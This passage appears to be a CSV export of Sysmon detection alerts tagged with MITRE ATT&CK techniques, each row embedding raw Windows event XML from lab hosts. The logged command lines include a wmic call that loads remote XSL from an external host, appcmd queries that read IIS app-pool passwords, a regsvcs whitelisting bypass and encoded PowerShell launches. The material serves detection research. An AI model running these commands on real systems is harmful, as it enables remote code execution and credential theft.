<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:13.389836Z"">
</TimeCreated>
<EventRecordID>19</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:13.309</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.650211,2019-04-18T20:58:13.650211+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:13.389836Z"">
</TimeCreated>
<EventRecordID>19</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:13.309</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\samlib.dll</Data>
<Data Name=""FileVersion"">6.1.7601.23677 (win7sp1_ldr.170209-0600)</Data>
<Data Name=""Description"">SAM Library DLL</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=922AF00065798A27238A6AE544BE314A3C3C7479,MD5=F3E69E053D4FA762A663ED7B77A5F4DD,SHA256=5D39A09D13D6085EDA7767771268E59888DE7ACE54E6DC9CA1B023E080254BCF,IMPHASH=B9E4EE1E8A5256343DE29E67C1CB41FA</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1556380673.931363,2019-04-27T19:57:53.931363+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /A ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-27T15:57:53.931363Z"">
</TimeCreated>
<EventRecordID>6594</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1912"" ThreadID=""996"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1059,technique_name=Command-Line Interface</Data>
<Data Name=""UtcTime"">2019-04-27 15:57:53.806</Data>
<Data Name=""ProcessGuid"">365ABB72-7C01-5CC4-0000-00105C5C0C00</Data>
<Data Name=""ProcessId"">3076</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd.exe /A</Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\AppData\Roaming\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-7AB1-5CC4-0000-0020BEF40000</Data>
<Data Name=""LogonId"">0xf4be</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-7C01-5CC4-0000-0010F9530C00</Data>
<Data Name=""ParentProcessId"">2992</Data>
<Data Name=""ParentImage"">C:\Users\IEUser\AppData\Roaming\NvSmart.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Users\IEUser\AppData\Roaming\NvSmart.exe&quot; </Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.43237,2019-05-27T05:29:18.432370+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.432370Z"">
</TimeCreated>
<EventRecordID>5925</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.392</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00100C96FF00</Data>
<Data Name=""ProcessId"">3136</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool /text:processmodel.username</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558633564.671625,2019-05-23T21:46:04.671625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T17:45:34.538296Z"">
</TimeCreated>
<EventRecordID>1025</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 17:45:34.528</Data>
<Data Name=""ProcessGuid"">365ABB72-DC3E-5CE6-0000-00102BC97200</Data>
<Data Name=""ProcessId"">712</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-CE6D-5CE6-0000-00109E190100</Data>
<Data Name=""ParentProcessId"">1472</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558630149.576625,2019-05-23T20:49:09.576625+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-23T16:49:08.422099Z"">
</TimeCreated>
<EventRecordID>896</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2032"" ThreadID=""2092"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-23 16:49:08.258</Data>
<Data Name=""ProcessGuid"">365ABB72-CF04-5CE6-0000-001010F20C00</Data>
<Data Name=""ProcessId"">4056</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">c:\</Data>
<Data Name=""User"">IEWIN7\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-CE6C-5CE6-0000-002047F30000</Data>
<Data Name=""LogonId"">0xf347</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-CF01-5CE6-0000-00105DA50C00</Data>
<Data Name=""ParentProcessId"">3872</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WMIC.exe</Data>
<Data Name=""ParentCommandLine"">wmic process list /format:&quot;https://a.uguu.se/x50IGVBRfr55_test.xsl&quot;</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436009.646278,2019-07-30T01:33:29.646278+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:29.565736Z"">
</TimeCreated>
<EventRecordID>4919</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:28.756</Data>
<Data Name=""ProcessGuid"">747F3D96-6628-5D3F-0000-0010B1968800</Data>
<Data Name=""ProcessId"">5708</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.NET\Framework64\v2.0.50727\regsvcs.exe AllTheThings.dll</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[ T1003 ] Credential Dumping ImageLoad,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,Medium,[ T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:12.979246Z"">
</TimeCreated>
<EventRecordID>18</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:12.919</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Cryptography Manager</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.389836,2019-04-18T20:58:13.389836+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>7</EventID>
<Version>3</Version>
<Level>4</Level>
<Task>7</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-04-18T16:58:12.979246Z"">
</TimeCreated>
<EventRecordID>18</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3192"" ThreadID=""164"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
<Data Name=""UtcTime"">2019-04-18 16:58:12.919</Data>
<Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
<Data Name=""ProcessId"">1200</Data>
<Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ImageLoaded"">C:\Windows\System32\cryptdll.dll</Data>
<Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Cryptography Manager</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""Hashes"">SHA1=C92A5E9D00AAC177C859B40247787E21D2483610,MD5=1128637CAD49A8E3C8B5FA5D0A061525,SHA256=6B80E50D8296F9E2C978CC6BC002B964ACFD8F4BCF623F4770513792845B5278,IMPHASH=CBB91DBEF75B54D8F20A2EC3E1BC8AC2</Data>
<Data Name=""Signed"">true</Data>
<Data Name=""Signature"">Microsoft Windows</Data>
<Data Name=""SignatureStatus"">Valid</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1558920558.352255,2019-05-27T05:29:18.352255+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( &quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.password ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-27T01:29:18.352255Z"">
</TimeCreated>
<EventRecordID>5922</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""324"" ThreadID=""2260"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>IEWIN7</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-05-27 01:29:18.322</Data>
<Data Name=""ProcessGuid"">365ABB72-3D6E-5CEB-0000-00104C92FF00</Data>
<Data Name=""ProcessId"">3100</Data>
<Data Name=""Image"">C:\Windows\System32\inetsrv\appcmd.exe</Data>
<Data Name=""FileVersion"">7.5.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Server Command Line Admin Tool</Data>
<Data Name=""Product"">Internet Information Services</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\inetsrv\appcmd.exe&quot; list apppool &quot;Description: Cannot read configuration file due to insufficient permissions&quot; /text:processmodel.password</Data>
<Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
<Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
<Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
<Data Name=""LogonId"">0x82423</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45</Data>
<Data Name=""ParentProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
<Data Name=""ParentProcessId"">2584</Data>
<Data Name=""ParentImage"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot; -nop -noni -enc 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</Data>
</EventData>
</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1552853872.97915,2019-03-18T00:17:52.979150+04:00,,Threat,Low,Found User (PC04\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-17T20:17:52.949107Z"">
</TimeCreated>
<EventRecordID>5260</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1852"" ThreadID=""464"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC04.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-17 20:17:52.899</Data>
<Data Name=""ProcessGuid"">365ABB72-AB70-5C8E-0000-0010781D0A00</Data>
<Data Name=""ProcessId"">3272</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">6.1.7601.17514 (win7sp1_rtm.101119-1850)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\install.bat&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\Desktop\RDPWrap-v1.6.2\</Data>
<Data Name=""User"">PC04\IEUser</Data>
<Data Name=""LogonGuid"">365ABB72-A960-5C8E-0000-002004C00300</Data>
<Data Name=""LogonId"">0x3c004</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163</Data>
<Data Name=""ParentProcessGuid"">365ABB72-A965-5C8E-0000-0010D9100400</Data>
<Data Name=""ParentProcessId"">3884</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",PC04.example.corp,Microsoft-Windows-Sysmon/Operational
[T1117] Bypassing Application Whitelisting,1603490302.074619,2020-10-24T01:58:22.074619+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\SysWOW64\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot; DATAUS~1.DLL f8755 4624665222 rd)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-23T21:58:22.066496Z"">
</TimeCreated>
<EventRecordID>424261</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3208"" ThreadID=""4804"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-23 21:58:22.062</Data>
